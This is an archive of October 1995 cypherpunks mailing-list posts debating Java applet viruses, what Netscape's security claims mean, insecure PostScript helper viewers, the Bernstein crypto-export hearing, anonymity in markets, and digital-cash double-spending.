In article <DGMpss.5q6@sgi.sgi.com>, fc@all.net (Dr. Frederick B. Cohen) writes:

>> 
>> At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
>> > A security feature in Java scans for viruses before activating the
>> > applet.
>> 
>> I hope that this is false.
>> 
>> Even if one had genuine artificial intelligence, it would be impossible
>> to detect all viruses, only particular viruses and classes of virus.
>> 
>> If Java is secure, virus scanning should be unnecessary, indeed 
>> impossible, because there could be no code configuration capable
>> of acting as a virus.
>> 
>> If virus scanning occurs, then it is possible to write a virus in Java,
>> then Java is inherently insecure.

> To be more precise, if there is programming, sharing, and transitive
> information flow, viruses can reproduce and spread (as proven
> mathematically in the mid-1980s).  Sice Java offers sharing of
> programs and (for not at least) transitive information flow, viruses
> are possible.

I'm certainly no expert on viruses, but doesn't that have to be
transitive flow of executable information?  If I'm just shipping data
around, there's no way you can infect me.  Does Java allow the client to
upload an applet to the server?  Can applets persist between netscape
sessions?  If the answer to both of these questions is no, then the
viability of viruses should be substantially degraded.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 18 Oct 95 17:28:13 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: [NOISE] Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <Pine.SUN.3.90.951018191650.5047A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Bah Iam tired of this bullshit.
To being the applet cant "take control" of HotJava. You can quit or return
to the previous page (thus stopping the applet). Further more
the guys are Sun are rewriting the code such that new frames are market
all over with warnings just like in safe TCL/TK. Iam sure that Netscape
will fallow suit. If you will please stop your ramblings are back up your 
stupid claims with code it will cut down the noise on this list generated
by your and people like me that can take it any longer and have to reply
quite a bit.

Oh, BTW, any such application anyway would be so big that the attack 
would only be possible on people with T1 connections. Who in their right mind
is gonna d/l and load a 8 meg applet.

P.S. Jeff I think you guys are doing a terrific job. Iam sorry you have 
to get grilled by mindless idiots all day long.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:

> Date: Wed, 18 Oct 1995 18:13:43 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> To: cypherpunks@toad.com
> Subject: 50 attacks on Netscape - please send the check
> 
> 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 18 Oct 95 19:29:44 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <DGn8F6.50y@sgi.sgi.com>
Message-ID: <199510190229.TAA13011@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGn8F6.50y@sgi.sgi.com>, fc@all.net (Dr. Frederick B. Cohen) writes:

> Jeff Weinstein - Electronic Munitions Specialist Wrote:
> ...
>> If a user configures a postscript viewer that has not had the
>> file operations disabled as a helper app to any web browser then
>> they are opening themselves up for a world of hurt.  The same is
>> true if they just download the file and run their viewer on it
>> manually.  The same is true if they configure /bin/sh as an
>> external viewer.
>> 
>> Obviously everyone should heed perry's warnings and emasculate
>> their postscript interpreters before using them to view files
>> of unknown origin.

> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:

> 	"Netscape can be used securely by sufficiently knowledgeable
> 	users who have emasculated their postscript interpreters before
> 	using them to view files of unknown origin, and who have removed
> 	all other known, unknown, and/or undisclosed security holes from
> 	their systems.  Otherwise, Netscape is insecure and should not be
> 	trusted."

If the user sets up a postscript viewer as an external viewer for
postscript files, it's not Netscape's fault if the viewer does something
insecure.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 18 Oct 95 19:45:09 PDT
To: cypherpunks, cypherpunks-announce, gnu
Subject: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
Message-ID: <9510190245.AA20897@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Last reminder!  Come to the Federal Building in SF this Friday at
10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
There for the first skirmish in the trial of crypto export controls.
450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.

We've gotten a lot of press interest.  Both the legal-newspapers in
SF, the Examiner, and many others will be covering it.  Some of them
breathlessly asked, "Will the cypherpunks hold a demonstration?", but
what we will demonstrate is how the legal system can turn against the
bureaucrats and authoritarians who currently hold crypto hostage.

This will be a low-key meeting, quietly bearing witness, at least
before we adjourn to a probably rowdy lunch at Max's Opera Cafe at Van
Ness and Golden Gate Avenues.  If you can't come to the hearing, at
least come for lunch!

And don't forget, it's a costume party: Dress like a banker.  Even
you bitbankers.  Even me.  See you there!

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Wed, 18 Oct 95 00:03:05 PDT
To: cypherpunks@toad.com
Subject: Re: transaction costs in anonymous markets
Message-ID: <pnr096593132l@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.951016011355.2241A-100000@eskimo.com> Wei Dai said:

 "Maintaining anonymity requires that communications be done through 
 special untraceable protocols."

I think it is important to keep in mind exactly what we mean by anonymity
in these discussions - there seems to be a bewildering array of flavours.

Take three situations where anonymity might be useful:

1. The State Authorities come and take you away for subscribing to a
publication advocating the end of socialised medicine.

2. The State Authorities come and take your assets away to pay for socialised
medicine.

3. The Private Hospital comes and takes your assets away to pay for your
lifesaving operation.

[Avoiding 1 is (in my opinion) an unmitigated good; avoiding 2 is obviously
desirable; but avoiding 3 could well be counter-productive.]

This points to two categories of anonymity:

   Meat anonymity - there is no way of knowing which human is responsible; and
   Asset anonymity - there is no way of linking a particular human, transaction
                     or activity to any particular asset, or vice versa.

The point being that sometimes one will be desirable without the other.

Concentrating on meat (or combined?) anonymity, there are (at least) two
sorts;

   Legal anonymity - where the split between asset and meat is the result
                     of the interposition of some legal structure (eg. Trust,
                     corporation etc), the ultimate owners/controllers of
                     which are unknown; and
   Digital anonymity - where the identity of the actor is mathematically
                       unknowable (at least, at the limit).

Obviously, these sorts can be layered, with legal entities transacting as
digitally anonymous parties, and the owners of those legal entities protected
by digital anonymity.

In addition, we can distinguish between digital anonymity that allows no
link between separate transactions (anonymity proper[?]), and digital
anonymity that does allow links to be drawn between separate transactions
or activities (pseudonymity).

Similarly, we can distinguish between the various anonymous properties of
transactions:

A. Private Transactions. Each party to the transaction knows the identity
of the others, but no third party can know who is transacting with whom.

B. Unilateral Anonymity. One party to the transaction is known, but the other
is unknowable. An example might be subscribing for a digital security with
ecash - the issuer is known, but the purchaser is anonymous.

C. Bilateral Anonymity. The identities of both parties to the transaction
are unknowable. This might be the case on a cypherpunk stock exchange...

                                        "The current state-of-art (i.e. 
 RemailerNet) adds several hours of transmition time to each message to 
 achieve effective untraceability.  Contract negotiation, for example, 
 becomes very difficult under these circumstances."

My experience of contract negotiation is that a delay of hours would be
immaterial. Don't forget that email, fax machines, and even the telephone
are relatively recent phenomena (not to mention the photocopier and the
word-processor). Most super-tight deadlines are self-inflicted.

"If these costs remain high, but anonymous markets develop regardless, it 
will be interesting to see how these costs affect the structure of the 
markets.  Will special protocols for contract negotiations develop to 
minimize the number of round-trip messages?"

Doubtless. In areas where complex transactions really have to be entered
into at short notice, a lot of the negotiation goes on in advance, often
by trade associations. ISDA, for instance, is forever producing standard
terms and appendices so that all manner of arcane derivative transactions
can be more or less negotiated over the phone.

Cheers,

Dm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMISijFlo3j8JHzalAQENEAP/UJTSvhAR534mh1KUQZQC1JYxZeROUaDf
6Nd42yxCmLbbSa72dEAB69jdfDHBj2sj6Jf6jL+HAGTrfG6I/dNJuKu9MaaCw64z
MKe0efTCmD2caehOv9lf5tI2uJ0vAql8UdCC5gj3NhkxKr/uEAvcbIlt/Z60mmEu
4P2hxCv1u/o=
=U8gP
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 17:19:39 PDT
To: David Neal <dneal@electrotex.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510182357.SAA05686@etex.electrotex.com>
Message-ID: <Pine.3.89.9510182023.B109863-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, David Neal wrote:

> YIKES!   Think again.  Many of the *.test newsgroups have auto-responders
> that remail the poster assuring them their post was received.  This feature
> is used to make sure your newsfeed is working.

Yeah, but you can turn them off by having "Test" in your header. I 
disovered this after getting my mailbox filled with those bloody 
auto-responses. It isn't really important since you're posting your file 
encrypted a second time in the first remailer's key, so the received file
will bear no resemblance to the original. 

And as far as wasting a lot of bandwidth is concerned, it would never be worse 
than the alt.binaries newsgroups.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 17:46:25 PDT
To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
Message-ID: <9510190043.AA11578@all.net>
MIME-Version: 1.0
Content-Type: text


Boy, you people just don't appreciate anything that has a little bit of
humor mixed with a little bit of reality. 

1 - I can't believe that you failed to see any humor in the fifty ways
to leave your Netscape posting.  I would have thought some of you would
have noticed that a substantial number of these methods would work with
current W3 browsers! Do I really have to set up a URL to prove it to
you? If I do, what good will it do me?

2 - I can't believe that you all think that aplets (a.k.a.  downloadable
programs at the push of a button) will make you safe.  The "we will only
run trusted applets and they will all be secure" attitude is 180 degrees
off base from my view.

3 - I would have figured at least one of you would have looked up the
chosen plaintext attack and told me why Netscape keys can't be gotten
at this way.  I think there's an off change I could win a grand!

4 - If you just keep quiet, I may be able to get $50K out of Netscape
for a few minutes of typing.  If they can make a billion on hype, why
can't I make $50K?

5 - How much do you want to bet that within 12 months of my posting, at
least 10 of the 50 listed items will have happened in one form or
another? I got the same flaming 8 months ago when I mentioned that I
thought syslog could be gotten at because of the way it was designed.
I got piles of flames telling me to show code or stop smearing syslog.
Three months later, a syslog attack appeared, and three months later,
another one showed up.

6 - I think that it is the responsibility of the people who claim
"security" to tell us what they mean by it and to demonstrate why we
should believe them.  You may disagree, but I didn't see any flames when
I asked what they meant by secure only a few days ago.  I also didn't
see any answers.

7 - I got one assertion that the reason my earlier message was perceived
as malicious was because I started with the word WRONG!!!  It's probably
correct that that's why I got flamed for it, so from now on, I want you
all to design your mail filters to replace WRONG!!! in my postings with
I respectfully disagree.

8 - The first 50 flamers responding to this message get a free 1 Gigabyte
email message every day for the next week.  Anonymous remailers included.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Wed, 18 Oct 95 13:10:01 PDT
To: cypherpunks@toad.com
Subject: digital cash and identity disclosure
Message-ID: <m0t5ej6-0002ebC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi...

In the Cyphernomicon, section 12.6.6, Tim May writes:

             - Chaum went to great lengths to develop system which
                preserve anonymity for single-spending instances, but
                which break anonymity and thus reveal identity for double-
                spending instances. I'm not sure what market forces
                caused him to think about this as being so important, but
                it creates many headaches. Besides being clumsy, it
                require physical ID, it invokes a legal system to try to
                collect from "double spenders," and it admits the
                extremely serious breach of privacy by enabling stings.
                For example, Alice pays Bob a unit of money, then quickly
                Alice spends that money before Bob can...Bob is then
                revealed as a "double spender," and his identity revealed
                to whomver wanted it...Alice, IRS, Gestapo, etc. A very
                broken idea. Acceptable mainly for small transactions.

But as far as I got Chaums idea, Alice would not reveal Bobs identity,
but rather her own. Am I missing a point here?

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMIVd0EyjTSyISdw9AQFvAQP/bLDQV1JEIXPlUxbUqMVffv62YQf4j6Wu
IkTr0qMjP4PLpLZFyKus+uf3JQIYsK660LdDykmcKafdYMH8LW6Z4SxDkkd2HwyY
Hsf5xW3aIfnyQ5bPcI5dhWz4hao9RJ23Hc7sjzvHVgTcrQCLf7ADixhPCm7xnq3n
YffnXg5slHU=
=pLXN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Julius A. Cisek" <jules@netscape.com>
Date: Wed, 18 Oct 95 21:43:53 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: [NOISE] Re: Postscript in Netscape
Message-ID: <199510190442.VAA11247@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 PM 10/18/95 -0400, you wrote:
>The point is, Netscape CLAIMS to provide security - Miscrosoft doesn't.

What do you mean by claim?  That a software "does something", right?  So if
a manual claims that copy will make a copy of a file, but someone has hacked
it to delete instead, isn't that the same thing?  Okay, it's a bad analogy
(take cover, a few more follow) but do you see my point?

Don't get me wrong.  I follow your logic, I just don't see how this will
benefit the internet business.  Many car manufacturers claim that their
air-bags make their cars safe, but do we expect them to add a disclaimer
that this is not the case when the car is set on fire?

When I buy The Club for my car am I expected to believe that it makes my car
invulnerable to burglary?  Yet the manufacturer "claims" just that!

I think pressing your idealism would render the word "secure" useless in any
situation, whether we're talking about software or diapers.

>On my machine, if you replace copy with delete, it will be detected
>before it does the delete, and, unless you are very skilled, when I tell
>it to copy, the corruption will be automatically corrected.  This is
>because I use an "integrity shell" - something you guys at Netscape
>probably never heard of. 

Personally, I haven't (but it sounds interesting).  So should the OS
provider tell it's users to use the integrity shell?

I get the feeling you think we're all a bunch of fledgling and ignorant
fools here.  In reality some of the brightest people I've ever met work
here.  And everyone here is taking personal pride in our products and
staying very much on top of what's going on around us.  We're not trying to
pull a fast one, we really want this stuff to work (and I truly believe that
we make the best, most secure browser on the market, period).

>> There's a point at which one has to hand off the assessment to the buyer.
>
>The point I have been trying to make that many on this list seem to ignore
>again and again, is that Netscape makes the security claims.  If you don't
>provide effective protection, don't make the claim.  If you want to make
>the claim back it up with something other than media hype.

We really don't control the media hype (we certainly don't have the $$$ to
buy a Rolling Stones song) and it (the media) has the potential to hurt us
as much as it can helped us.

Again, I see your point here, but this is capitalism after all.  I'm sure if
our "holes" are bad enough then we will be naturally selected out of the
picture.  I know, it would be nice to avoid the damage to the "customer",
but there is no way to do that.  The only way someone on the internet can be
truly secure (whatever that means) is not to be on it at all.  However, as a
user of the Navigator I'm not terribly paranoid about my security being
breached.  *To me* the product IS secure because breaching that security is
hard enough that in all likelihood no one will bother.

>	- making inadequately supported claims about a nebulous
>	thing called "security".

To me security doesn't mean anything absolute and I think it's wrong for
anyone to argue for absolute security because it's unachievable.  To me
security means making it harder for people to mess with my "stuff".
Therefore the Netscape claim is quite reasonable.

>	- using it as a basis to get people to invest millions (billions?)
>	of dollars.

People have invested in much more dangerous endeavors throughout history.
What's wrong with that?  And I'm sure there are people who are investing in
Netscape for other reasons (like, for example, because we're really cool,
which I can tell you is absolutely true <g>).

>	- plans to use it to move millions, and eventually billions of
>	dollars over the Internet, potentially placing a fair chunk of the
>	world economy (I'm mot kidding) as well as individual privacy
>	(and thus freedom) at risk.

Not any more than credit cards are already doing!  Come on, a trash can at
K-Mart is a lot less secure than the Navigator.  I do understand the
difference, but there is no such thing as absolutely secure transactions
involving money in any medium.  The point is to try and make it hard enough
to make it a rare occurrence.  I feel that we do that.

>	- may succeed unless people who do understand the implications
>	find a way to fix the thing.

Maybe we will do that here!  <g>  Again, you're not giving us enough credit,
imho.

>These things concern me, so I will stand my ground regardless of the
>flames and ask, yet again, for someone at Netscape to tell us what you
>mean by "security" when you make claims about it 
>why your claims are strong enough for a big chunk of the world economy
>to rest on it. 

If we truly are so evil and/or stupid, people will find out and the
competition will crush us.  Frankly, I'm more worried about people who try
to "protect the ignorant masses" than a hacker who breaks my code for a
credit card transaction.

>(I won't repost my
>questions from a few days ago since you have already ignored them)

I did not ignore them.  I didn't see them.  They must have been in a thread
that was not interesting to me.  Also, I only casually glance at this group
when I have a free moment, which isn't very often.

Ugly disclaimer:
This post is not an official Netscape statement.  As a matter of fact it's
not a Netscape statement at all.  I am merely posting from my Netscape
account.  I'm truly sorry about this, but that's just part of the business.
Therefore, please don't make any "claims" based on this post.

~Jules (Julius Cisek)   /- __  -   mailto:jules@netscape.com
Server Eng, NETSCAPE  /\ >\=/\ --- http://home.netscape.com/people/jules
MtnView-CA-USA-Earth  \/   -\/ --  p:415.528.2968 f:415.528.4122
          ---===> COGITO ERGO VROOM <===---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 19:35:07 PDT
To: jules@netscape.com (Julius Cisek)
Subject: [NOISE] Re: Postscript in Netscape
In-Reply-To: <3085AE63.BB6@netscape.com>
Message-ID: <9510190231.AA15730@all.net>
MIME-Version: 1.0
Content-Type: text


> Dr. Frederick B. Cohen wrote:
> > I respectfully disagree. Netscape claims to be "secure" - hence it is Netscape's job to
> > be secure - regardless of the user's use of their product.  Otherwise,
> > the ads should read:
> > 
> >         "Netscape can be used securely by sufficiently knowledgeable
> >         users who have emasculated their postscript interpreters before
> >         using them to view files of unknown origin, and who have removed
> >         all other known, unknown, and/or undisclosed security holes from
> >         their systems.  Otherwise, Netscape is insecure and should not be
> >         trusted."
> 
> Err...  If software companies were to follow your line of logic, software
> boxes (all sorts of software) would become covered with fine print.  As
> would ads for the software.  Although I'm sure industry lawyers would
> welcome that, personally I think it would be quite sad.

The point is, Netscape CLAIMS to provide security - Miscrosoft doesn't.

> 
> A stupid example:
> I can replace copy on your machine so that it does a delete instead.
> Does that mean that the OS manufacturer has to warn a user about this?

On my machine, if you replace copy with delete, it will be detected
before it does the delete, and, unless you are very skilled, when I tell
it to copy, the corruption will be automatically corrected.  This is
because I use an "integrity shell" - something you guys at Netscape
probably never heard of. 

> There's a point at which one has to hand off the assessment to the buyer.

The point I have been trying to make that many on this list seem to ignore
again and again, is that Netscape makes the security claims.  If you don't
provide effective protection, don't make the claim.  If you want to make
the claim back it up with something other than media hype.

> This is my own opinion and also that of anyone who agrees with me.
> I'm reading this group because it's very interesting for me personally.
> There.

All of our opinions are our own, and my opinion is that Netscape (not you) is:

	- making inadequately supported claims about a nebulous
	thing called "security".

	- using it as a basis to get people to invest millions (billions?)
	of dollars.

	- plans to use it to move millions, and eventually billions of
	dollars over the Internet, potentially placing a fair chunk of the
	world economy (I'm mot kidding) as well as individual privacy
	(and thus freedom) at risk.

	- may succeed unless people who do understand the implications
	find a way to fix the thing.

These things concern me, so I will stand my ground regardless of the
flames and ask, yet again, for someone at Netscape to tell us what you
mean by "security" when you make claims about it (I won't repost my
questions from a few days ago since you have already ignored them) and
why your claims are strong enough for a big chunk of the world economy
to rest on it. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 23:13:37 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <3085AE63.BB6@netscape.com>
Message-ID: <3085EB9F.5C18@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> > Dr. Frederick B. Cohen wrote:
> > > I respectfully disagree. Netscape claims to be "secure" - hence it is Netscape's 
job to
> > > be secure - regardless of the user's use of their product.  Otherwise,
> > > the ads should read:
> > >
> > >         "Netscape can be used securely by sufficiently knowledgeable
> > >         users who have emasculated their postscript interpreters before
> > >         using them to view files of unknown origin, and who have removed
> > >         all other known, unknown, and/or undisclosed security holes from
> > >         their systems.  Otherwise, Netscape is insecure and should not be
> > >         trusted."
> >
> > Err...  If software companies were to follow your line of logic, software
> > boxes (all sorts of software) would become covered with fine print.  As
> > would ads for the software.  Although I'm sure industry lawyers would
> > welcome that, personally I think it would be quite sad.
> 
> The point is, Netscape CLAIMS to provide security - Miscrosoft doesn't.

  Here is a quote from Microsoft's Internet Explorer 2.0 Beta announcement,
which can be found at http://www.microsoft.com/windows/pr/sept2895.htm:


    Internet Explorer 2.0 also provides users with a secure environment.
    Complete support for Secure Sockets Layer (SSL) and RSA encryption
    allows integration with secure sites. In addition, Internet
    Explorer 2.0 will support Private Communication Technology (PCT),
    which is an efficient and secure upgrade to the SSL protocol.
    Internet Explorer will also support Secure Transaction Technology
    (STT), an electronic payment technology jointly developed by
    Microsoft and Visa International, as soon as it is available. 

  There is that pesky word "secure", five times in one paragraph.

> >
> > A stupid example:
> > I can replace copy on your machine so that it does a delete instead.
> > Does that mean that the OS manufacturer has to warn a user about this?
> 
> On my machine, if you replace copy with delete, it will be detected
> before it does the delete, and, unless you are very skilled, when I tell
> it to copy, the corruption will be automatically corrected.  This is
> because I use an "integrity shell" - something you guys at Netscape
> probably never heard of.

  What if they replace your "integrity shell"?

> > There's a point at which one has to hand off the assessment to the buyer.
> 
> The point I have been trying to make that many on this list seem to ignore
> again and again, is that Netscape makes the security claims.  If you don't
> provide effective protection, don't make the claim.  If you want to make
> the claim back it up with something other than media hype.

  We are working on clarifying our security claims.  Here is an
example from the San Jose Mercury news on Aug. 17, 1995:

    "We have said for a long time that given the right amount of
    computer power, that a 40-bit key encrypted message could be
    decrypted," said Mike Homer, Netscape's vice president of marketing. 

> > This is my own opinion and also that of anyone who agrees with me.
> > I'm reading this group because it's very interesting for me personally.
> > There.
> 
> All of our opinions are our own, and my opinion is that Netscape (not you) is:
> 
>         - making inadequately supported claims about a nebulous
>         thing called "security".

  Here is one definition of the word "security" from the Webster's
New World Dictionary, Third Edition:

    protection or defense against attack, espionage, etc.

  Note that I make no claims that this is Netscape's definition of
security in our products.

>         - using it as a basis to get people to invest millions (billions?)
>         of dollars.

  Billions of dollars have not been invested in Netscape.  An examination
of the prospectus and the current stock price will bear this out.

  Here is a quote from the Netscape prospectus:

    The Company has included in its products an implementation of the
    Secure Sockets Layer ("SSL"), a security protocol which operates in
    conjunction with encryption and authentication technology licensed
    from RSA Data Security, Inc. ("RSA").  Despite the existence of
    these technologies, the Company's products may be vulnerable to
    break-ins and similar disruptive problems caused by Internet users.
    Such computer break-ins and other disruptions would jeopardize the
    security of information stored in and transmitted through the
    computer systems of end users of the Company's products...

  Of course anyone who is interested in investing in Netscape's
stock should get and read the entire prospectus.

>         - plans to use it to move millions, and eventually billions of
>         dollars over the Internet, potentially placing a fair chunk of the
>         world economy (I'm mot kidding) as well as individual privacy
>         (and thus freedom) at risk.

  It would have to be many billions of dollars before it becomes
"a fair chunk of the world economy", and I think that even the
most optimistic projections of internet commerce put that many
years in the future.

>         - may succeed unless people who do understand the implications
>         find a way to fix the thing.
> 
> These things concern me, so I will stand my ground regardless of the
> flames and ask, yet again, for someone at Netscape to tell us what you
> mean by "security" when you make claims about it (I won't repost my
> questions from a few days ago since you have already ignored them) and
> why your claims are strong enough for a big chunk of the world economy
> to rest on it.

  I don't think that it is reasonable to expect that everyone who
asks for an official company position on some random mailing list
will get a response.  The people who make such statements are not
usually on such lists, and the have other forums for making public
statements.  Perhaps you should call our PR department for a statement.

  You are certainly free to "stand your ground", but I am also
free to not respond to you.

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blake@io.org (Blake Harris)
Date: Wed, 18 Oct 95 23:40:10 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120347.UAA27336@infinity.c2.org>
Message-ID: <Zhchw8RRq4nf084yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510120347.UAA27336@infinity.c2.org>, sameer wrote:
> 
> 	I completely agree that the reporters on this list make things
> very difficult and people do need to be very careful about posting
> things which will get misinterpreated by reporters.. but--
> 
> 	This list is -not- an "announcement" list. If I see a
> potential bug, I want other cypherpunks to tell me whether I am onto
> something or not, so I would post. If some idiot reporter takes that
> and writes an article saying "XXX has a hole" that is -EXTREMELY BAD
> REPORTING-.
> 	I understand though, that we can't control what the reporters
> say and how they interpret what we say. It is very important to word
> your posts carefully such that when you post a bug a reporter won't
> think that they should write an article on it until it is verified.
> 	It's very sad, though, that we have to be very careful about
> what we post now because of the media attention. I would prefer if the
> list could just be a forum where we can discuss things, but that is
> not the case.
> 

Folks:

Don't lose heart completely that your discussions on this list are
not being read carefully by some of the media. As a case in point, I'm a
freelance magazine writer who has been lurking on this list for at least 6
months (although I do get behind at times due to the volume). My reason
for doing so is to become familiar enough with crypto issues so I
might be able to write intelligently about these at some point in the
future.

Bad or superficial reporting is just that. It is part of a writer's job
to understand what he is writing about, or at least understand it enough
to be able to accurately inform the uninformed about something.

You shouldn't be too disheartened about mis-reporting regarding this
list because there is definitely something you can do about it -- at
least after the fact. There is nothing that makes a sincere writer
squirm more than his getting his facts wrong or even inadvertently
misinforming his readers.

If someone mis-reports something which is discussed on the cypherpunk
list, a letter to the editor clearly pointing out the factual error not
only has a good chance of getting printed, but also places the writer in
an uncomfortable position of having egg on his face with his colleagues,
bosses, etc. And while this might not undo the damage done by the
original article, the writer or reporter is subsequently likely to
check his facts a lot more carefully when writing about the topic
again (unless he or his editors have a hidden agenda).

Which isn't to say that the writers and reporters who lurk here will
necessarily agree completely with the general cypherpunk views regarding
crypto-anarchy and other such matters.

However, this is high quality mail list and the more that writers
and reporters lurking here, the more chance there is that your views
will be understood and given serious consideration. And those views will
increasingly surface as at least _one_ point of view presented in media
articles, whether they specifically mention cypherpunks or not.

Worthwhile ideas, if a few people keep putting them out there, have a
way permeating a culture in strange and sometimes almost untraceable
ways. Or as Margaret Mead put it: "Never doubt that a small group of
thoughtful, committed citizens can change the world; indeed, it's the
only thing that ever does."


... back into lurk mode.

-- Blake Harris






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Oct 95 00:33:42 PDT
To: cypherpunks@toad.com
Subject: crypto export from the UK
Message-ID: <199510190728.AAA02916@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Could people in the UK please tell me what the crypto export
laws are like there? I know someone who wrote some really great crypto
code in the UK but isn't willing to distribute it because of crypto
export laws... I was under the impression that it was legal to export
crypto from the UK.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 18 Oct 95 21:32:53 PDT
To: cypherpunks@toad.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
Message-ID: <9510190432.AA04434@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From die Wed Oct 18 21:42:07 1995
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
To: roy@cybrspc.mn.org
Date: Wed, 18 Oct 1995 21:42:07 -0400 (EDT)
From: "Dave Emery" <die@pig.die.com>
Reply-To: die@die.com
In-Reply-To: <951017.172824.4H9.rnr.w165w@cybrspc.mn.org> from "Roy M. Silvernail" at Oct 17, 95 05:28:24 pm
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1135      

Roy Silvernail writes:

> This comes from the fact that PROMs are typically mask-programmed at the
> fabrication stage.  EPROMS are programmed in the field.  And yes, if you
> could get the top of the chip off cleanly, you could erase and reprogram
> them.  (not likely, and hardly undetectable, but it's ever so slightly
> possible)  More often, I see these devices called OTP (for One Time
> Programmable).  In the more standard types (27C256, for example),
> they're a fraction of the cost of the erasable ones.  Ceramic cases and
> quartz windows are spendy.

	Perhaps someone with more semiconductor physics background
can correct me, but my understanding is that some kinds of nuclear
radiation can be used to erase OTP EPROMS.   I suppose this might damage
the crystal lattice badly enough to render the device useless in
some bit positions or reduce data retention time a lot, but I sure
wouldn't bet any security on devices out there not being 
arbitrarily reprogrammable (thus using bits to represent digital
coins in a wallet that get reset when they are spent is not a
good idea).

						Dave Emery
						die@die.com

> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goldberg@superlink.net
Date: Wed, 18 Oct 95 22:40:15 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510190543.BAA28883@mars.superlink.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 PM 10/14/95 -0700, anonymous-remailer@shell.portal.com wrote:
